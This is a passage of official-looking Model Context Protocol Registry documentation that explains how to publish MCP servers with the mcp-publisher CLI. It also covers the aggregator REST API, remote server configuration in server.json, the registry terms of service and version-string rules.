The MCPB package URL (`identifier` in `server.json`) **MUST** contain the string "mcp". This requirement can be satisfied by the `.mcpb` file extension or by the name of the repository.
The package metadata in `server.json` **MUST** include a `fileSha256` property with a SHA-256 hash of the MCPB artifact, which can be computed using the `openssl` command:
```bash theme={null}
openssl dgst -sha256 image-processor.mcpb
```
The MCP Registry does not validate this hash; however, MCP clients **do** validate the hash before installation to ensure file integrity. Downstream registries may also implement their own validation.
# Quickstart: Publish an MCP Server to the MCP Registry
Source: https://modelcontextprotocol.io/registry/quickstart
The MCP Registry is currently in preview. Breaking changes or data resets may occur before general availability. If you encounter any issues, please report them on [GitHub](https://github.com/modelcontextprotocol/registry/issues).
This tutorial will show you how to publish an MCP server written in TypeScript to the MCP Registry using the official `mcp-publisher` CLI tool.
## Prerequisites
* **Node.js** — This tutorial assumes the MCP server is written in TypeScript.
* **npm account** — The MCP Registry only hosts metadata, not artifacts. Before publishing to the MCP Registry, we will publish the MCP server's package to npm, so you will need an [npm](https://www.npmjs.com) account.
* **GitHub account** — The MCP Registry supports [multiple authentication methods](./authentication.mdx). For simplicity, this tutorial will use GitHub-based authentication, so you will need a [GitHub](https://github.com/) account.
If you do not have an MCP server written in TypeScript, you can copy the `weather-server-typescript` server from the [`modelcontextprotocol/quickstart-resources` repository](https://github.com/modelcontextprotocol/quickstart-resources) to follow along with this tutorial:
```bash theme={null}
git clone --depth 1 git@github.com:modelcontextprotocol/quickstart-resources.git
cp -r quickstart-resources/weather-server-typescript .
rm -rf quickstart-resources
cd weather-server-typescript
```
And edit `package.json` to reflect your information:
```diff package.json theme={null}
{
- "name": "mcp-quickstart-ts",
- "version": "1.0.0",
+ "name": "@my-username/mcp-weather-server",
+ "version": "1.0.1",
"main": "index.js",
```
```diff package.json theme={null}
"license": "ISC",
- "description": "",
+ "repository": {
+ "type": "git",
+ "url": "https://github.com/my-username/mcp-weather-server.git"
+ },
+ "description": "An MCP server for weather information.",
"devDependencies": {
```
## Step 1: Add verification information to the package
The MCP Registry verifies that a server's underlying package matches its metadata. For npm packages, this requires adding an `mcpName` property to `package.json`:
```diff package.json theme={null}
{
"name": "@my-username/mcp-weather-server",
"version": "1.0.1",
+ "mcpName": "io.github.my-username/weather",
"main": "index.js",
```
The value of `mcpName` will be your server's name in the MCP Registry.
Because we will be using GitHub-based authentication, `mcpName` **must** start with `io.github.my-username/`.
## Step 2: Publish the package
The MCP Registry only hosts metadata, not artifacts, so we must publish the package to npm before publishing the server to the MCP Registry.
Ensure the distribution files are built:
```bash theme={null}
# Navigate to project directory
cd weather-server-typescript
# Install dependencies
npm install
# Build the distribution files
npm run build
```
Then follow npm's [publishing guide](https://docs.npmjs.com/creating-and-publishing-scoped-public-packages). In particular, you will probably need to run the following commands:
```bash theme={null}
# If necessary, authenticate to npm
npm adduser
# Publish the package
npm publish --access public
```
You can verify your package is published by visiting its npm URL, such as [https://www.npmjs.com/package/@my-username/mcp-weather-server](https://www.npmjs.com/package/@my-username/mcp-weather-server).
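Alternatively, you can verify from the command line with `npm view` (using the example package name from above):
```bash theme={null}
npm view @my-username/mcp-weather-server version
```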
## Step 3: Install `mcp-publisher`
Install the `mcp-publisher` CLI tool using a pre-built binary or [Homebrew](https://brew.sh):
```bash macOS/Linux theme={null}
curl -L "https://github.com/modelcontextprotocol/registry/releases/latest/download/mcp-publisher_$(uname -s | tr '[:upper:]' '[:lower:]')_$(uname -m | sed 's/x86_64/amd64/;s/aarch64/arm64/').tar.gz" | tar xz mcp-publisher && sudo mv mcp-publisher /usr/local/bin/
```
```powershell Windows theme={null}
$arch = if ([System.Runtime.InteropServices.RuntimeInformation]::ProcessArchitecture -eq "Arm64") { "arm64" } else { "amd64" }; Invoke-WebRequest -Uri "https://github.com/modelcontextprotocol/registry/releases/latest/download/mcp-publisher_windows_$arch.tar.gz" -OutFile "mcp-publisher.tar.gz"; tar xf mcp-publisher.tar.gz mcp-publisher.exe; rm mcp-publisher.tar.gz
# Move mcp-publisher.exe to a directory in your PATH
```
```bash Homebrew theme={null}
brew install mcp-publisher
```
Verify that `mcp-publisher` is correctly installed by running:
```bash theme={null}
mcp-publisher --help
```
You should see output like:
```text Output theme={null}
MCP Registry Publisher Tool
Usage:
mcp-publisher [arguments]
Commands:
init Create a server.json file template
login Authenticate with the registry
logout Clear saved authentication
publish Publish server.json to the registry
```
## Step 4: Create `server.json`
The `mcp-publisher init` command can generate a `server.json` template file with some information derived from your project.
In your server project directory, run `mcp-publisher init`:
```bash theme={null}
mcp-publisher init
```
Open the generated `server.json` file, and you should see contents like:
```json server.json theme={null}
{
"$schema": "https://static.modelcontextprotocol.io/schemas/2025-12-11/server.schema.json",
"name": "io.github.my-username/weather",
"description": "An MCP server for weather information.",
"repository": {
"url": "https://github.com/my-username/mcp-weather-server",
"source": "github"
},
"version": "1.0.0",
"packages": [
{
"registryType": "npm",
"identifier": "@my-username/mcp-weather-server",
"version": "1.0.0",
"transport": {
"type": "stdio"
},
"environmentVariables": [
{
"description": "Your API key for the service",
"isRequired": true,
"format": "string",
"isSecret": true,
"name": "YOUR_API_KEY"
}
]
}
]
}
```
Edit the contents as necessary:
```diff server.json theme={null}
{
"$schema": "https://static.modelcontextprotocol.io/schemas/2025-12-11/server.schema.json",
"name": "io.github.my-username/weather",
"description": "An MCP server for weather information.",
"repository": {
"url": "https://github.com/my-username/mcp-weather-server",
"source": "github"
},
- "version": "1.0.0",
+ "version": "1.0.1",
"packages": [
{
"registryType": "npm",
"identifier": "@my-username/mcp-weather-server",
- "version": "1.0.0",
+ "version": "1.0.1",
"transport": {
"type": "stdio"
- },
- "environmentVariables": [
- {
- "description": "Your API key for the service",
- "isRequired": true,
- "format": "string",
- "isSecret": true,
- "name": "YOUR_API_KEY"
- }
- ]
+ }
}
]
}
```
The `name` property in `server.json` **must** match the `mcpName` property in `package.json`.
## Step 5: Authenticate with the MCP Registry
For this tutorial, we will authenticate with the MCP Registry using GitHub-based authentication.
Run the `mcp-publisher login` command to initiate authentication:
```bash theme={null}
mcp-publisher login github
```
You should see output like:
```text Output theme={null}
Logging in with github...
To authenticate, please:
1. Go to: https://github.com/login/device
2. Enter code: ABCD-1234
3. Authorize this application
Waiting for authorization...
```
Visit the link, follow the prompts, and enter the authorization code that was printed in the terminal (e.g., `ABCD-1234` in the above output). Once complete, go back to the terminal, and you should see output like:
```text Output theme={null}
Successfully authenticated!
✓ Successfully logged in
```
## Step 6: Publish to the MCP Registry
Finally, publish your server to the MCP Registry using the `mcp-publisher publish` command:
```bash theme={null}
mcp-publisher publish
```
You should see output like:
```text Output theme={null}
Publishing to https://registry.modelcontextprotocol.io...
✓ Successfully published
✓ Server io.github.my-username/weather version 1.0.1
```
You can verify that your server is published by searching for it using the MCP Registry API:
```bash theme={null}
curl "https://registry.modelcontextprotocol.io/v0.1/servers?search=io.github.my-username/weather"
```
You should see your server's metadata in the search results JSON:
```text Output theme={null}
{"servers":[{ ... "name":"io.github.my-username/weather" ... }]}
```
## Troubleshooting
| Error Message | Action |
| --------------------------------------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------- |
| "Registry validation failed for package" | Ensure your package includes the required validation information (e.g, `mcpName` property in `package.json`). |
| "Invalid or expired Registry JWT token" | Re-authenticate by running `mcp-publisher login github`. |
| "You do not have permission to publish this server" | Your authentication method doesn't match your server's namespace format. With GitHub auth, your server name must start with `io.github.your-username/`. |
## Next Steps
* Learn about [support for other package types](./package-types.mdx).
* Learn about [support for remote servers](./remote-servers.mdx).
* Learn how to [use other authentication methods](./authentication.mdx), such as [DNS authentication](./authentication.mdx#dns-authentication) which enables custom domains for server name prefixes.
* Learn how to [automate publishing with GitHub Actions](./github-actions.mdx).
# MCP Registry Aggregators
Source: https://modelcontextprotocol.io/registry/registry-aggregators
The MCP Registry is currently in preview. Breaking changes or data resets may occur before general availability. If you encounter any issues, please report them on [GitHub](https://github.com/modelcontextprotocol/registry/issues).
Aggregators are downstream consumers of the MCP Registry that provide additional value, such as a server marketplace that provides user ratings and security scanning.
The MCP Registry provides an unauthenticated read-only REST API that aggregators can use to populate their data stores. Aggregators are expected to scrape data on a regular but infrequent basis (e.g., once per hour), and persist the data in their own data store. The MCP Registry **does not provide uptime or data durability guarantees**.
## Consuming the MCP Registry REST API
The base URL for the MCP Registry REST API is `https://registry.modelcontextprotocol.io`. It supports the following endpoints:
* [`GET /v0.1/servers`](https://registry.modelcontextprotocol.io/docs#/operations/list-servers-v0.1) — List all servers.
* [`GET /v0.1/servers/{serverName}/versions`](https://registry.modelcontextprotocol.io/docs#/operations/get-server-versions-v0.1) — List all versions of a server.
* [`GET /v0.1/servers/{serverName}/versions/{version}`](https://registry.modelcontextprotocol.io/docs#/operations/get-server-version-v0.1) — Get a specific version of a server. Use the special version `latest` to get the latest version of the server.
URL path parameters such as `serverName` and `version` **must** be URL-encoded. For example, `io.modelcontextprotocol/everything` must be encoded as `io.modelcontextprotocol%2Feverything`.
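For example, to fetch the latest version of `io.modelcontextprotocol/everything`, encode the server name in the path:
```bash theme={null}
curl "https://registry.modelcontextprotocol.io/v0.1/servers/io.modelcontextprotocol%2Feverything/versions/latest"
```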
Aggregators will most likely scrape the `GET /v0.1/servers` endpoint.
### Pagination
The `GET /v0.1/servers` endpoint supports cursor-based pagination.
For example, the first page can be fetched using a `limit` query parameter:
```bash theme={null}
curl "https://registry.modelcontextprotocol.io/v0.1/servers?limit=100"
```
```jsonc Output highlight={5} theme={null}
{
"servers": [
/* ... */
],
"metadata": {
"count": 100,
"nextCursor": "com.example/my-server:1.0.0",
},
}
```
Then subsequent pages can be fetched by passing the `nextCursor` value as the `cursor` query parameter:
```bash theme={null}
curl "https://registry.modelcontextprotocol.io/v0.1/servers?limit=100&cursor=com.example/my-server:1.0.0"
```
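Putting these together, here is a minimal scraping sketch in shell; it assumes `jq` is installed and omits error handling and retry logic:
```bash theme={null}
BASE_URL="https://registry.modelcontextprotocol.io/v0.1/servers"
CURSOR=""
while :; do
  if [ -n "${CURSOR}" ]; then
    PAGE="$(curl -s "${BASE_URL}?limit=100&cursor=${CURSOR}")"
  else
    PAGE="$(curl -s "${BASE_URL}?limit=100")"
  fi
  # Process this page (here we just print each server name)
  echo "${PAGE}" | jq -r '.servers[].name'
  # Continue until there is no nextCursor
  CURSOR="$(echo "${PAGE}" | jq -r '.metadata.nextCursor // empty')"
  [ -z "${CURSOR}" ] && break
done
```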
### Filtering Since a Timestamp
The `GET /v0.1/servers` endpoint supports filtering servers that have been updated since a given timestamp.
For example, servers that have been updated since 2025-10-23 can be fetched using an `updated_since` query parameter in [RFC 3339](https://datatracker.ietf.org/doc/html/rfc3339) date-time format:
```bash theme={null}
curl "https://registry.modelcontextprotocol.io/v0.1/servers?updated_since=2025-10-23T00:00:00.000Z"
```
## Server Status
Server metadata is generally immutable, except for the `status` field, which may be updated to, e.g., `"deprecated"` or `"deleted"`. We recommend that aggregators keep their copy of each server's `status` up to date.
The `"deleted"` status typically indicates that a server has violated our permissive [moderation policy](./moderation-policy.mdx), suggesting the server might be spam, malware, or illegal. Aggregators may prefer to remove these servers from their index.
## Acting as a Subregistry
A subregistry is an aggregator that also implements the [OpenAPI spec](https://github.com/modelcontextprotocol/registry/blob/main/docs/reference/api/openapi.yaml) defined by the MCP Registry. This allows clients, such as MCP host applications, to consume server metadata via a standardized interface.
The subregistry OpenAPI spec allows subregistries to inject custom metadata via the `_meta` field. For example, a subregistry could inject user ratings, download counts, and security scan results:
```json server.json highlight={17-26} theme={null}
{
"$schema": "https://static.modelcontextprotocol.io/schemas/2025-12-11/server.schema.json",
"name": "io.github.username/email-integration-mcp",
"title": "Email Integration",
"description": "Send emails and manage email accounts",
"version": "1.0.0",
"packages": [
{
"registryType": "npm",
"identifier": "@username/email-integration-mcp",
"version": "1.0.0",
"transport": {
"type": "stdio"
}
}
],
"_meta": {
"com.example.subregistry/custom": {
"user_rating": 4.5,
"download_count": 12345,
"security_scan": {
"last_scanned": "2025-10-23T12:00:00Z",
"vulnerabilities_found": 0
}
}
}
}
```
We recommend that custom metadata be put under a key that reflects the subregistry (e.g., `"com.example.subregistry/custom"` in the above example).
# Publishing Remote Servers
Source: https://modelcontextprotocol.io/registry/remote-servers
The MCP Registry is currently in preview. Breaking changes or data resets may occur before general availability. If you encounter any issues, please report them on [GitHub](https://github.com/modelcontextprotocol/registry/issues).
The MCP Registry supports remote MCP servers via the `remotes` property in `server.json`:
```json server.json highlight={7-12} theme={null}
{
"$schema": "https://static.modelcontextprotocol.io/schemas/2025-12-11/server.schema.json",
"name": "com.example/acme-analytics",
"title": "ACME Analytics",
"description": "Real-time business intelligence and reporting platform",
"version": "2.0.0",
"remotes": [
{
"type": "streamable-http",
"url": "https://analytics.example.com/mcp"
}
]
}
```
A remote server **MUST** be publicly accessible at its specified URL.
## Transport Type
Remote servers can use the Streamable HTTP transport (recommended) or the SSE transport. Remote servers can also support both transports simultaneously at different URLs.
Specify the transport by setting the `type` property of the `remotes` entry to either `"streamable-http"` or `"sse"`:
```json server.json highlight={9,13} theme={null}
{
"$schema": "https://static.modelcontextprotocol.io/schemas/2025-12-11/server.schema.json",
"name": "com.example/acme-analytics",
"title": "ACME Analytics",
"description": "Real-time business intelligence and reporting platform",
"version": "2.0.0",
"remotes": [
{
"type": "streamable-http",
"url": "https://analytics.example.com/mcp"
},
{
"type": "sse",
"url": "https://analytics.example.com/sse"
}
]
}
```
## URL Template Variables
Remote servers can define URL template variables using `{curly_braces}` notation. This enables multi-tenant deployments where a single server definition can support multiple endpoints with configurable values:
```json server.json highlight={10-17} theme={null}
{
"$schema": "https://static.modelcontextprotocol.io/schemas/2025-12-11/server.schema.json",
"name": "com.example/acme-analytics",
"title": "ACME Analytics",
"description": "Real-time business intelligence and reporting platform",
"version": "2.0.0",
"remotes": [
{
"type": "streamable-http",
"url": "https://{tenant_id}.analytics.example.com/mcp",
"variables": {
"tenant_id": {
"description": "Your tenant identifier (e.g., 'us-cell1', 'emea-cell1')",
"isRequired": true
}
}
}
]
}
```
When configuring this server, users provide their `tenant_id` value, and the URL template gets resolved to the appropriate endpoint (e.g., `https://us-cell1.analytics.example.com/mcp`).
Variables support additional properties like `default`, `choices`, and `isSecret`:
```json server.json highlight={12-22} theme={null}
{
"$schema": "https://static.modelcontextprotocol.io/schemas/2025-12-11/server.schema.json",
"name": "com.example/multi-region-mcp",
"title": "Multi-Region MCP",
"description": "MCP server with regional endpoints",
"version": "1.0.0",
"remotes": [
{
"type": "streamable-http",
"url": "https://api.example.com/{region}/mcp",
"variables": {
"region": {
"description": "Deployment region",
"isRequired": true,
"choices": [
"us-east-1",
"eu-west-1",
"ap-southeast-1"
],
"default": "us-east-1"
}
}
}
]
}
```
## HTTP Headers
MCP clients can be instructed to send specific HTTP headers by adding the `headers` property to the `remotes` entry:
```json server.json highlight={11-18} theme={null}
{
"$schema": "https://static.modelcontextprotocol.io/schemas/2025-12-11/server.schema.json",
"name": "com.example/acme-analytics",
"title": "ACME Analytics",
"description": "Real-time business intelligence and reporting platform",
"version": "2.0.0",
"remotes": [
{
"type": "streamable-http",
"url": "https://analytics.example.com/mcp",
"headers": [
{
"name": "X-API-Key",
"description": "API key for authentication",
"isRequired": true,
"isSecret": true
}
]
}
]
}
```
## Supporting Remote and Non-remote Installation
The `remotes` property can coexist with the `packages` property in `server.json`, allowing MCP host applications to choose their preferred installation method:
```json server.json highlight={7-22} theme={null}
{
"$schema": "https://static.modelcontextprotocol.io/schemas/2025-12-11/server.schema.json",
"name": "io.github.username/email-integration-mcp",
"title": "Email Integration",
"description": "Send emails and manage email accounts",
"version": "1.0.0",
"remotes": [
{
"type": "streamable-http",
"url": "https://email.example.com/mcp"
}
],
"packages": [
{
"registryType": "npm",
"identifier": "@example/email-integration-mcp",
"version": "1.0.0",
"transport": {
"type": "stdio"
}
}
]
}
```
# Official MCP Registry Terms of Service
Source: https://modelcontextprotocol.io/registry/terms-of-service
The MCP Registry is currently in preview. Breaking changes or data resets may occur before general availability. If you encounter any issues, please report them on [GitHub](https://github.com/modelcontextprotocol/registry/issues).
**Effective date: 2025-09-02**
## Overview
These terms (“Terms”) govern your access to and use of the official MCP Registry (the service hosted at [https://registry.modelcontextprotocol.io/](https://registry.modelcontextprotocol.io/) or a successor location) (“Registry”), including submissions or publications of MCP servers, references to MCP servers or to data about such servers and/or their developers (“Registry Data”), and related conduct. The Registry is intended to be a centralized repository of MCP servers developed by community members to facilitate easy access by AI applications.
These terms are governed by the laws of the State of California.
## For All Users
1. No Warranties. The Registry is provided “as is” with no warranties of any kind. That means we don't guarantee the accuracy, completeness, safety, durability, or availability of the Registry, servers included in the registry, or Registry Data. In short, we’re also not responsible for any MCP servers or Registry Data, and we highly recommend that you evaluate each MCP server and its suitability for your intended use case(s) before deciding whether to use it.
2. Access and Use Requirements. To access or use the Registry, you must:
1. Be at least 18 years old.
2. Use the Registry, MCP servers in the Registry, and Registry Data only in ways that are legal under the applicable laws of the United States or other countries including the country in which you are a resident or from which you access and use the Registry, and not be barred from accessing or using the Registry under such laws. You will comply with all applicable law, regulation, and third party rights (including, without limitation, laws regarding the import or export of data or software, privacy, intellectual property, and local laws). You will not use the Registry, MCP servers, or Registry Data to encourage or promote illegal activity or the violation of third party rights or terms of service.
3. Log in via method(s) approved by the Registry maintainers, which may involve using applications or other software owned by third parties.
3. Entity Use. If you are accessing or using the Registry on behalf of an entity, you represent and warrant that you have authority to bind that entity to these Terms. By accepting these Terms, you are doing so on behalf of that entity (and all references to “you” in these Terms refer to that entity).
4. Account Information. In order to access or use the Registry, you may be required to provide certain information (such as identification or contact details) as part of a registration process or in connection with your access or use of the Registry or MCP servers therein. Any information you give must be accurate and up-to-date, and you agree to inform us promptly of any updates. You understand that your use of the Registry may be monitored to ensure quality and verify your compliance with these Terms.
5. Feedback. You are under no obligation to provide feedback or suggestions. If you provide feedback or suggestions about the Registry or the Model Context Protocol, then we (and those we allow) may use such information without obligation to you.
6. Branding. Only use the term “Official MCP Registry” where it is clear it refers to the Registry, and does not imply affiliation, endorsement, or sponsorship. For example, you can permissibly say “Acme Inc. keeps its data up to date by automatically pulling data from the Official MCP Registry” or “This data comes from the Official MCP Registry,” but cannot say “This is the website for the Official MCP Registry,” “We’re the premier destination to view Official MCP Registry data,” or “We’ve partnered with the Official MCP Registry to provide this data.”
7. Modification. We may modify the Terms or any portion to, for example, reflect changes to the law or changes to the Model Context Protocol. We’ll post notice of modifications to the Terms to this website or a successor location. If you do not agree to the modified Terms, you should discontinue your access to and/or use of the Registry. Your continued access to and/or use of the Registry constitutes your acceptance of any modified Terms.
8. Additional Terms. Depending on your intended use case(s), you must also abide by applicable terms below.
## For MCP Developers
9. Prohibitions. By accessing and using the Registry, including by submitting MCP servers and/or Registry Data, you agree not to:
1. Share malicious or harmful content, such as malware, even in good faith or for research purposes, or perform any action with the intent of introducing any viruses, worms, defects, Trojan horses, malware, or any items of a destructive nature;
2. Defame, abuse, harass, stalk, or threaten others;
3. Interfere with or disrupt the Registry or any associated servers or networks;
4. Submit data with the intent of confusing or misleading others, including but not limited to via spam, posting off-topic marketing content, posting MCP servers in a way that falsely implies affiliation with or endorsement by a third party, or repeatedly posting the same or similar MCP servers under different names;
5. Promote or facilitate unlawful online gambling or disruptive commercial messages or advertisements;
6. Use the Registry for any activities where the use or failure of the Registry could lead to death, personal injury, or environmental damage;
7. Use the Registry to process or store any data that is subject to the International Traffic in Arms Regulations maintained by the U.S. Department of State.
10. License. You agree that metadata about MCP servers you submit (e.g., schema name and description, URLs, identifiers) and other Registry Data is intended to be public, and will be dedicated to the public domain under [CC0 1.0 Universal](https://creativecommons.org/publicdomain/zero/1.0/). By submitting such data, you agree that you have the legal right to make this dedication (i.e., you own the copyright to these submissions or have permission from the copyright owner(s) to do so) and intend to do so. You understand that this dedication is perpetual, irrevocable, and worldwide, and you waive any moral rights you may have in your contributions to the fullest extent permitted by law. This dedication applies only to Registry Data and not to packages in third party registries that you might point to.
11. Privacy and Publicity. You understand that any MCP server metadata you publish may be made public. This includes personal data such as your GitHub username, domain name, or details from your server description. Moreover, you understand that others may process personal information included in your MCP server metadata. For example, subregistries might enrich this data by adding how many stars your GitHub repository has, or perform automated security scanning on your code. By publishing a server, you agree that others may engage in this sort of processing, and you waive rights you might have in some jurisdictions to access, rectify, erase, restrict, or object to such processing.
# Versioning Published MCP Servers
Source: https://modelcontextprotocol.io/registry/versioning
The MCP Registry is currently in preview. Breaking changes or data resets may occur before general availability. If you encounter any issues, please report them on [GitHub](https://github.com/modelcontextprotocol/registry/issues).
MCP servers **MUST** define a version string in `server.json`. For example:
```json server.json highlight={6} theme={null}
{
"$schema": "https://static.modelcontextprotocol.io/schemas/2025-12-11/server.schema.json",
"name": "io.github.username/email-integration-mcp",
"title": "Email Integration",
"description": "Send emails and manage email accounts",
"version": "1.0.0",
"packages": [
{
"registryType": "npm",
"identifier": "@username/email-integration-mcp",
"version": "1.0.0",
"transport": {
"type": "stdio"
}
}
]
}
```
The version string **MUST** be unique for each publication of the server. Once published, the version string (and other metadata) cannot be changed.
## Version Format
The MCP Registry recommends [semantic versioning](https://semver.org/), but supports any version string format. When a server is published, the MCP Registry will attempt to parse its version as a semantic version string for sorting purposes, and will mark the version as "latest" if appropriate. If parsing fails, the version will always be marked as "latest".
If a server uses semantic version strings but publishes a new version that does *not* conform to semantic versioning, the new version will be marked as "latest" even if it would otherwise be sorted before the semantic version strings.
As an error prevention mechanism, the MCP Registry prohibits version strings that appear to refer to ranges of versions.
| Example | Type | Guidance |
| -------------- | ------------------- | ------------------------------ |
| `1.0.0` | semantic version | **Recommended** |
| `2.1.3-alpha` | semantic prerelease | **Recommended** |
| `1.0.0-beta.1` | semantic prerelease | **Recommended** |
| `3.0.0-rc.2` | semantic prerelease | **Recommended** |
| `2025.11.25` | semantic date | Recommended |
| `2025.6.18` | semantic date | Recommended **(⚠️Caution!⚠️)** |
| `2025.06.18` | non-semantic date | Allowed **(⚠️Caution!⚠️)** |
| `2025-06-18` | non-semantic date | Allowed |
| `v1.0` | prefixed version | Allowed |
| `^1.2.3` | version range | Prohibited |
| `~1.2.3` | version range | Prohibited |
| `>=1.2.3` | version range | Prohibited |
| `<=1.2.3` | version range | Prohibited |
| `>1.2.3` | version range | Prohibited |
| `<1.2.3` | version range | Prohibited |
| `1.x` | version range | Prohibited |
| `1.2.*` | version range | Prohibited |
| `1 - 2` | version range | Prohibited |
| `1.2 \|\| 1.3` | version range | Prohibited |
The cautions concern zero-padded dates: semantic versioning prohibits leading zeros, so `2025.06.18` does not parse as a semantic version and will always be marked as "latest" when published (see above), while the otherwise equivalent `2025.6.18` parses and sorts normally. Mixing the two styles can therefore produce surprising version ordering.
## Best Practices
### Use Semantic Versioning
Use [semantic versioning](https://semver.org/) for version strings.
### Align Server Version with Package Version
For local servers, align the server version with the underlying package version in order to prevent confusion:
```json server.json highlight={2,7} theme={null}
{
"version": "1.2.3",
"packages": [
{
"registryType": "npm",
"identifier": "@my-username/my-server",
"version": "1.2.3",
"transport": {
"type": "stdio"
}
}
]
}
```
If there are multiple underlying packages, use the server version to indicate the overall release version:
```json server.json highlight={2,7,15} theme={null}
{
"version": "1.3.0",
"packages": [
{
"registryType": "npm",
"identifier": "@my-username/my-server",
"version": "1.3.0",
"transport": {
"type": "stdio"
}
},
{
"registryType": "nuget",
"identifier": "MyUsername.MyServer",
"version": "1.0.0",
"transport": {
"type": "stdio"
}
}
]
}
```
### Align Server Version with Remote API Version
For remote servers with an API version, the server version should align with the API version:
```json server.json highlight={2,6} theme={null}
{
"version": "2.1.0",
"remotes": [
{
"type": "streamable-http",
"url": "https://api.myservice.com/mcp/v2.1"
}
]
}
```
### Use Prerelease Versions for Registry-only Updates
If you anticipate publishing a server multiple times *without* changing the underlying package or remote URL — for example, to update other parts of the metadata — use semantic prerelease versions:
```json server.json highlight={2} theme={null}
{
"version": "1.2.3-1",
"packages": [
{
"registryType": "npm",
"identifier": "@my-username/my-server",
"version": "1.2.3",
"transport": {
"type": "stdio"
}
}
]
}
```
According to semantic versioning, prerelease versions such as `1.2.3-1` are sorted before regular semantic versions such as `1.2.3`. Therefore, if you publish a prerelease version *after* its corresponding regular version, the prerelease version will **not** be marked as "latest".
## Aggregator Recommendations
MCP Registry aggregators **SHOULD**:
1. Attempt to interpret versions as semantic versions when possible
2. Use the following version comparison rules:
* If one version is marked as "latest", treat it as later
* If both versions are valid semantic versions, use semantic versioning comparison rules
* If neither version is a valid semantic version, compare published timestamps
* If one version is a valid semantic version and the other is not, treat the semantic version as later